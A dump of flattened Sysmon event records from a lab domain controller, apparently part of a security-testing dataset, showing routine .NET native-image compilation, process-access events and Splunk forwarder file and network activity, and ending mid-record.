21:04:34.522{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E2-60D3-EF03-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020944Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.381{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E2-60D3-EE03-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020943Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.365{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1E2-60D3-EE03-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020942Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.365{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E2-60D3-EE03-00000000CF01}4100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020941Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:34.334{4DB9351A-A1E1-60D3-ED03-00000000CF01}6792C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a88-0\Microsoft.Windows.FileServer.Management.Common.dll2021-06-23 21:04:34.334 23542300x800000000000000020940Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.287{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DCC72F4405804C8B7AB947DE4F515E,SHA256=4E78397F312FCD147A1AB9F490D98BEFA51023A185DA9FE4A88488B15693983C,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020950Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:34.202{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61427-false10.0.1.12-8000- 23542300x800000000000000020949Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:35.318{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62894FD304237F61C88A89FFD899E458,SHA256=D24532FC84485E26A77986C21A6F6F43AF68B311AB1D2C7DA423E86CC44322A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020951Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:36.318{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1874781E62C0D187ACDD9452573825F1,SHA256=4BE95BDCC7580A04DE16FCCE36DFEF2D329AB8DD0668DC176FA89B0D139740D3,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020956Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:37.850{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E5-60D3-F003-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020955Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:37.756{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1E5-60D3-F003-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020954Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:37.756{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E5-60D3-F003-00000000CF01}5828C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020953Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:37.537{4DB9351A-A1E2-60D3-EF03-00000000CF01}5004C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\138c-0\Microsoft.Windows.FileServer.Management.Plugin.dll2021-06-23 21:04:37.537 23542300x800000000000000020952Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:37.334{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0593524B4D4E7B470246CA364101F8F,SHA256=FDC7D2524FFBC4D5A5033A406DE38ADDBC76D8A7B57840EFA17ECCA9BF5C2EE2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020961Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:38.772{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=45B0D42F221239BBDA19A2CFED660B51,SHA256=2FC9CEF80CB58ABFDAA406A403654E92CF305511FAC7DAAE6355C0D877060A8A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020960Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:38.381{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B45C0BD44D31C5FEFD01ED6C37D98B8D,SHA256=DC28EF5B4A7C9190979A5B51D26AF7F1DE16CF767D71A18F3E8C35856DC5E493,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020959Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:38.162{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E6-60D3-F103-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020958Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:38.131{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E6-60D3-F103-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020957Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:38.131{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E6-60D3-F103-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020963Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:39.384{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95A02C17B7F126582949E64C8CD8CC9F,SHA256=0A06AF8728A9D539314AAC8149AD6C96FBFE0ACB5FD6681158088739F8EB3B18,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000020962Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:39.100{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020965Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:39.140{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61428-false10.0.1.12-8089- 23542300x800000000000000020964Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:40.397{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50ECA3E65D0F954803C69267DAEE54FC,SHA256=0DA8AAD5545FFB219AE62639462009F8A834EF734EAA545914CAB27FB6318B41,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000020971Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:40.217{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61429-false10.0.1.12-8000- 10341000x800000000000000020970Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.818{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020969Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.740{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020968Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.740{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1E9-60D3-F203-00000000CF01}6740C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020967Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:41.553{4DB9351A-A1E6-60D3-F103-00000000CF01}2636C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\a4c-0\Microsoft.Windows.FileServer.Management.Plugin.UI.dll2021-06-23 21:04:41.537 23542300x800000000000000020966Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:41.443{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=94BF1C364FE4B0568BF3AA368C1BCE41,SHA256=DD3DA79F35875BE3DCE4E5DC7F001DBE808FCDFF6B7CE9AC500FBE8E25DE7311,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000020991Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:42.975{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1ad0-0\Microsoft.Windows.ServerManager.Activities.dll2021-06-23 21:04:42.975 10341000x800000000000000020990Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.865{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020989Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.850{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020988Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:42.850{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1EA-60D3-F703-00000000CF01}6864C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020987Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 